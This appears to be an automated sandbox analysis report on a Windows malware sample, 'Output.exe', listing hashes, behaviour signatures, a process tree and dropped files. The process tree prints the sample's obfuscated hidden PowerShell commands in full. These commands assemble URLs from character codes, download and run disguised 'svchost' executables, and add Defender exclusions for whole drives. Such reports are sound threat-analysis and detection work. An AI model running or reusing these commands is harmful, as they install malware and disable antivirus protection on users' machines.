Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    07/03/2025, 17:16

General

  • Target

    Output.exe

  • Size

    127KB

  • MD5

    c5a8c92a6eae175507942fcdb7b6f4d7

  • SHA1

    b75512ae6d1da96e091a657deb49f6047e696bb4

  • SHA256

    59ae3f7403be6eb6d175e19fccc41998188e27419b4f1e3bc9e2e36f123fc36a

  • SHA512

    0796a4886d9e0f078f9a6a1e324cdfbbbfde1a991e2c2be4d764db12980f8b4b6ca743d707a1561587df4dc9d78fb71bf17cb21d3e886e1ccee28a913c44f592

  • SSDEEP

    3072:e274NpVq8BxFRzaqF+o2GQJ7/JzqVfGv2:eegVqwlL

Score
8/10

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Output.exe
    "C:\Users\Admin\AppData\Local\Temp\Output.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1780
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\ProgramData\SecorKit.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]104);$url+=([char]116);$url+=([char]116);$url+=([char]112);$url+=([char]115);$url+=([char]58);$url+=([char]47);$url+=([char]47);$url+=([char]102);$url+=([char]105);$url+=([char]108);$url+=([char]101);$url+=([char]115);$url+=([char]46);$url+=([char]99);$url+=([char]97);$url+=([char]116);$url+=([char]98);$url+=([char]111);$url+=([char]120);$url+=([char]46);$url+=([char]109);$url+=([char]111);$url+=([char]101);$url+=([char]47);$url+=([char]115);$url+=([char]50);$url+=([char]54);$url+=([char]53);$url+=([char]107);$url+=([char]111);$url+=([char]46);$url+=([char]115);$url+=([char]101);$url+=([char]99);$url+=([char]114);$url+=([char]111);$url+=([char]52);$url+=([char]50);$url+=([char]56);$url+=([char]56);$url+=([char]49);$url+=([char]53);$url+=([char]54);$url+=([char]52);$url+=([char]52);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url='';$url+=([char]0x68);$url+=([char]0x74);$url+=([char]0x74);$url+=([char]0x70);$url+=([char]0x73);$url+=([char]0x3a);$url+=([char]0x2f);$url+=([char]0x2f);$url+=([char]0x66);$url+=([char]0x69);$url+=([char]0x6c);$url+=([char]0x65);$url+=([char]0x73);$url+=([char]0x2e);$url+=([char]0x63);$url+=([char]0x61);$url+=([char]0x74);$url+=([char]0x62);$url+=([char]0x6f);$url+=([char]0x78);$url+=([char]0x2e);$url+=([char]0x6d);$url+=([char]0x6f);$url+=([char]0x65);$url+=([char]0x2f);$url+=([char]0x73);$url+=([char]0x32);$url+=([char]0x36);$url+=([char]0x35);$url+=([char]0x6b);$url+=([char]0x6f);$url+=([char]0x2e);$url+=([char]0x73);$url+=([char]0x65);$url+=([char]0x63);$url+=([char]0x72);$url+=([char]0x6f);$url+=([char]0x34);$url+=([char]0x32);$url+=([char]0x38);$url+=([char]0x38);$url+=([char]0x31);$url+=([char]0x35);$url+=([char]0x36);$url+=([char]0x34);$url+=([char]0x34);$output=\"$env:PUBLIC\svchost.exe\";Invoke-WebRequest -Uri $url -OutFile $output;Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url0=''; $url0+=([char]104);$url0+=([char]116);$url0+=([char]116);$url0+=([char]112);$url0+=([char]115);$url0+=([char]58);$url0+=([char]47);$url0+=([char]47);$url0+=([char]102);$url0+=([char]105);$url0+=([char]108);$url0+=([char]101);$url0+=([char]115);$url0+=([char]46);$url0+=([char]99);$url0+=([char]97);$url0+=([char]116);$url0+=([char]98);$url0+=([char]111);$url0+=([char]120);$url0+=([char]46);$url0+=([char]109);$url0+=([char]111);$url0+=([char]101);$url0+=([char]47);$url0+=([char]99);$url0+=([char]102);$url0+=([char]117);$url0+=([char]111);$url0+=([char]105);$url0+=([char]56);$url0+=([char]46);$url0+=([char]102);$url0+=([char]117);$url0+=([char]107); $output=\"$env:PUBLIC\svhost0.exe\"; Invoke-WebRequest -Uri $url0 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2492
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url1=''; $url1+=([char]104);$url1+=([char]116);$url1+=([char]116);$url1+=([char]112);$url1+=([char]115);$url1+=([char]58);$url1+=([char]47);$url1+=([char]47);$url1+=([char]102);$url1+=([char]105);$url1+=([char]108);$url1+=([char]101);$url1+=([char]115);$url1+=([char]46);$url1+=([char]99);$url1+=([char]97);$url1+=([char]116);$url1+=([char]98);$url1+=([char]111);$url1+=([char]120);$url1+=([char]46);$url1+=([char]109);$url1+=([char]111);$url1+=([char]101);$url1+=([char]47);$url1+=([char]110);$url1+=([char]56);$url1+=([char]110);$url1+=([char]117);$url1+=([char]103);$url1+=([char]51);$url1+=([char]46);$url1+=([char]102);$url1+=([char]117);$url1+=([char]99);$url1+=([char]107); $output=\"$env:PUBLIC\svhost1.exe\"; Invoke-WebRequest -Uri $url1 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle Hidden -Command "$url2=''; $url2+=([char]104);$url2+=([char]116);$url2+=([char]116);$url2+=([char]112);$url2+=([char]115);$url2+=([char]58);$url2+=([char]47);$url2+=([char]47);$url2+=([char]102);$url2+=([char]105);$url2+=([char]108);$url2+=([char]101);$url2+=([char]115);$url2+=([char]46);$url2+=([char]99);$url2+=([char]97);$url2+=([char]116);$url2+=([char]98);$url2+=([char]111);$url2+=([char]120);$url2+=([char]46);$url2+=([char]109);$url2+=([char]111);$url2+=([char]101);$url2+=([char]47);$url2+=([char]104);$url2+=([char]98);$url2+=([char]108);$url2+=([char]50);$url2+=([char]105);$url2+=([char]103);$url2+=([char]46);$url2+=([char]115);$url2+=([char]101);$url2+=([char]99);$url2+=([char]114);$url2+=([char]111); $output=\"$env:PUBLIC\svhost2.exe\"; Invoke-WebRequest -Uri $url2 -OutFile $output; Start-Process -FilePath $output -Wait
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c mountvol | find ":"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\mountvol.exe
          mountvol
          4⤵
            PID:1484
          • C:\Windows\system32\find.exe
            find ":"
            4⤵
              PID:1440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath MOUNTVOL
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1164
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath MOUNTVOL
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath MOUNTVOL
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath MOUNTVOL
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath Possible
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath C:\
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath F:\
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -c add-mppreference -exclusionpath D:\
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:908

Downloads

  • C:\ProgramData\SecorKit.bat

    Filesize
    4KB

    MD5
    bc1626613575b1b6f297de25534b5558

    SHA1
    3e09f43f58461e7ae1da21a3a7401e802c9501db

    SHA256
    bf212323f92dd7b684fd7b61fdc56b984d48396d80022aacb5b803031d454000

    SHA512
    7b736f2416e0354661805ce06bf05e4515d56ab4a2dc4f6118df6d86053742064f867c762a251c06eee548cbc46ba5e788a8b49a6e59bafdb4e7d662776d869f

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize
    7KB

    MD5
    e973ca35d90bf0000afd00ec6b83c1fe

    SHA1
    1c6db2a6372af1838521ad2f062660f917457d97

    SHA256
    b4f0f77be7f7403b09b2d53da5f19e37a2cc7487e75b607ea333694a45b63fac

    SHA512
    f5e0b660fd7f67c107bf1f628e58f0097351d64d6bdab83df99c73972516788b636c1c461d7b5b8bba50d7580d5fda61668478e01828fa1ab02d6b35af01f392

  • memory/1780-0-0x000007FEF57E3000-0x000007FEF57E4000-memory.dmp

    Filesize
    4KB

  • memory/1780-1-0x0000000000D60000-0x0000000000D86000-memory.dmp

    Filesize
    152KB

  • memory/2436-24-0x0000000002780000-0x0000000002788000-memory.dmp

    Filesize
    32KB

  • memory/2436-23-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

    Filesize
    2.9MB

  • memory/2640-15-0x00000000029D0000-0x0000000002A50000-memory.dmp

    Filesize
    512KB

  • memory/2640-16-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

    Filesize
    2.9MB

  • memory/2640-17-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize
    32KB